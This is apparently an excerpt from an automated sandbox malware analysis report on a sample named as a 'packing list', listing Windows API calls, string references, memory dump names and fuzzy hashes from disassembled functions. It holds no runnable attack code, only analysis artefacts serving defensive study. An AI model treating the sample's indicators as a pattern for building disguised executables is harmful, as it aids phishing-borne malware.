                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: LengthMessageSendTextWindow
                                                  • String ID: edit
                                                  • API String ID: 2978978980-2167791130
                                                  • Opcode ID: 460df6ed58a18f6186daf042ee7da558ab42c87434ba72450235b3f21608cf92
                                                  • Instruction ID: b1f786fd2ead816133d4d5c789ed650bce318341c52c0d2607957ed5397d7ebe
                                                  • Opcode Fuzzy Hash: 460df6ed58a18f6186daf042ee7da558ab42c87434ba72450235b3f21608cf92
                                                  • Instruction Fuzzy Hash: 6A118C71500108ABEF509FA8DC80EEB3BAAEB15378F504768FA65931E0C776DC50D760
                                                  APIs
                                                  • _memset.LIBCMT ref: 00B752D5
                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00B752F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: 0e06afe5abece3cdbb55c5e20e057c7d8dfd4c2e61cd6ea4bf3b8fe6f47562bd
                                                  • Instruction ID: eb8462ab77d59940ade480bddd3ba7f49b9ffc8b27dafa0c969a3b605801df93
                                                  • Opcode Fuzzy Hash: 0e06afe5abece3cdbb55c5e20e057c7d8dfd4c2e61cd6ea4bf3b8fe6f47562bd
                                                  • Instruction Fuzzy Hash: 30110372A00614EBDB30DA9CC940BAD77F9EB05390F0581A5E96EA71A0E7F0ED04C7A0
                                                  APIs
                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B84DF5
                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B84E1E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Internet$OpenOption
                                                  • String ID: <local>
                                                  • API String ID: 942729171-4266983199
                                                  • Opcode ID: 1d9bfa3f65a7347c39d40ea17ce023fa6b213fd64d06e248cd01f34cc50cff3a
                                                  • Instruction ID: d3ddc1b2e0c0ccb0934f91640359c142518045bca1f1c4a305a53ab65e8a0c0f
                                                  • Opcode Fuzzy Hash: 1d9bfa3f65a7347c39d40ea17ce023fa6b213fd64d06e248cd01f34cc50cff3a
                                                  • Instruction Fuzzy Hash: C2115A70501222BBDB299F6288C9EEBFAE8FB16755F10826AF51596150E7B09D40C7E0
                                                  APIs
                                                  • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00B8A84E
                                                  • htons.WSOCK32(00000000,?,00000000), ref: 00B8A88B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: htonsinet_addr
                                                  • String ID: 255.255.255.255
                                                  • API String ID: 3832099526-2422070025
                                                  • Opcode ID: c1fa2625b0f9033bc8abef4395d24fe0104ee8e244e24185306c67fa791b68cf
                                                  • Instruction ID: 4617b6543d2b83d8b26ea11d6516108dfaaea3b7b99a20764801aef52f37ffc3
                                                  • Opcode Fuzzy Hash: c1fa2625b0f9033bc8abef4395d24fe0104ee8e244e24185306c67fa791b68cf
                                                  • Instruction Fuzzy Hash: D901F975200305ABDB10AF64C886FADB7E4EF44710F1085ABF5159B2E1DB75E805C762
                                                  APIs
                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B6B7EF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 3850602802-1403004172
                                                  • Opcode ID: 1ab375a686967a60d7afd535fd3f2ded3259e938aed02a5bfad27f92d8072017
                                                  • Instruction ID: b24493392e11f5b009cc58a12ca01be02298796bef658486cfc1819546329883
                                                  • Opcode Fuzzy Hash: 1ab375a686967a60d7afd535fd3f2ded3259e938aed02a5bfad27f92d8072017
                                                  • Instruction Fuzzy Hash: DA01D471A40118ABCB04EBA4CC52DFE73FDBF55350B14069DF462A72D2EB7869088B90
                                                  APIs
                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00B6B6EB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 3850602802-1403004172
                                                  • Opcode ID: f6377612bc2dcc7bc4ca4fe4c3218dbe6dd1169eafed5e01d13c31c1943f98c2
                                                  • Instruction ID: db5dffcfab0a28bf7c7a29bb26ce73874d2317292701fe06485105b6f2e5ba05
                                                  • Opcode Fuzzy Hash: f6377612bc2dcc7bc4ca4fe4c3218dbe6dd1169eafed5e01d13c31c1943f98c2
                                                  • Instruction Fuzzy Hash: 58016271A41118ABCB04EBA4C952EFEB7FD9F15344F2001A9B503B3191EB585E189BB5
                                                  APIs
                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00B6B76C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 3850602802-1403004172
                                                  • Opcode ID: 53247b0f03bf50ffcfea260ee01db44ca51e7e78d9efe4841089dbc6209f4a05
                                                  • Instruction ID: f1ede798fc673a137eacb65d158734caa911f8a02caaee292cae380659149204
                                                  • Opcode Fuzzy Hash: 53247b0f03bf50ffcfea260ee01db44ca51e7e78d9efe4841089dbc6209f4a05
                                                  • Instruction Fuzzy Hash: 4E01D671A40108ABCB00E7A4C952EFE73FC9B15340F2001A9B402B3192EB685E098BB5
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp
                                                  • String ID: #32770
                                                  • API String ID: 2292705959-463685578
                                                  • Opcode ID: a2a9229f3b2696959e423adb3ea149dc7dae65eeeb4aa23e414296598fdb0e0f
                                                  • Instruction ID: 82c34e7400924e29e2500dfc5114e6656cc9b88ee30eec8f15219c35c29140be
                                                  • Opcode Fuzzy Hash: a2a9229f3b2696959e423adb3ea149dc7dae65eeeb4aa23e414296598fdb0e0f
                                                  • Instruction Fuzzy Hash: 99E092776042252BD710EAA9AC09F97FBECEB55B64F000196B915E3041EA70EA4587D4
                                                  APIs
                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B6A63F
                                                    • Part of subcall function 00B513F1: _doexit.LIBCMT ref: 00B513FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Message_doexit
                                                  • String ID: AutoIt$Error allocating memory.
                                                  • API String ID: 1993061046-4017498283
                                                  • Opcode ID: cca1dd67dd5b412a64a464b60b28626345025705caa45df0032a8fa89b2cdcc8
                                                  • Instruction ID: 4cb3772d431792b20b9acffd5b8e46ea0d3741eef591eca1f310af03fcfda531
                                                  • Opcode Fuzzy Hash: cca1dd67dd5b412a64a464b60b28626345025705caa45df0032a8fa89b2cdcc8
                                                  • Instruction Fuzzy Hash: CDD05B313C435833D31436996C17FD976CCCB15B52F1404F5BB09965D35DDA9A4041DD
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 00BAACC0
                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00BAAEBD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: DirectoryFreeLibrarySystem
                                                  • String ID: WIN_XPe
                                                  • API String ID: 510247158-3257408948
                                                  • Opcode ID: 0e656ac02be4ba48ff773461307fd4d3fdf5c76a121f98a689cd5c9f6590520c
                                                  • Instruction ID: 521be2b8bfd5c5d8bd02c9f0f0a470a04e2c5e741180fc6e7cc757868d1cb2ba
                                                  • Opcode Fuzzy Hash: 0e656ac02be4ba48ff773461307fd4d3fdf5c76a121f98a689cd5c9f6590520c
                                                  • Instruction Fuzzy Hash: F3E0A570C14549ABDB15DFA9DD849ECB7F8EB49301F1481C5E112B2260EB705A84DF36
                                                  APIs
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B986A2
                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B986B5
                                                    • Part of subcall function 00B77A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00B77AD0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: FindMessagePostSleepWindow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 529655941-2988720461
                                                  • Opcode ID: 8580fc7c4f39b198b0edddc5e745a7ccb5e4c9fd2ff9f4e888ed324fa38dbf92
                                                  • Instruction ID: b6bab6c9ec7ae7d5a854120be6db5e5a5d36bf0d2366d98ae834f146b594c3e2
                                                  • Opcode Fuzzy Hash: 8580fc7c4f39b198b0edddc5e745a7ccb5e4c9fd2ff9f4e888ed324fa38dbf92
                                                  • Instruction Fuzzy Hash: 39D01231384354B7F27867719C0FFC67B98AB14B11F100955B74AAB1D0DDE4E940CB54
                                                  APIs
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B986E2
                                                  • PostMessageW.USER32(00000000), ref: 00B986E9
                                                    • Part of subcall function 00B77A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00B77AD0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: FindMessagePostSleepWindow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 529655941-2988720461
                                                  • Opcode ID: a4d2c90a53711085d2db21463cfcd46f923ecd2bdc24a10710b993bfd14a57e5
                                                  • Instruction ID: 823396dbf3e4df9b9290e91a077d1cfe05fde6c39dd5ea6c31f9ce529478809a
                                                  • Opcode Fuzzy Hash: a4d2c90a53711085d2db21463cfcd46f923ecd2bdc24a10710b993bfd14a57e5
                                                  • Instruction Fuzzy Hash: DDD0A9313803147BF22863309C0BFC62A88AB14B10F000914B60AAB1D0CDE4E9008B14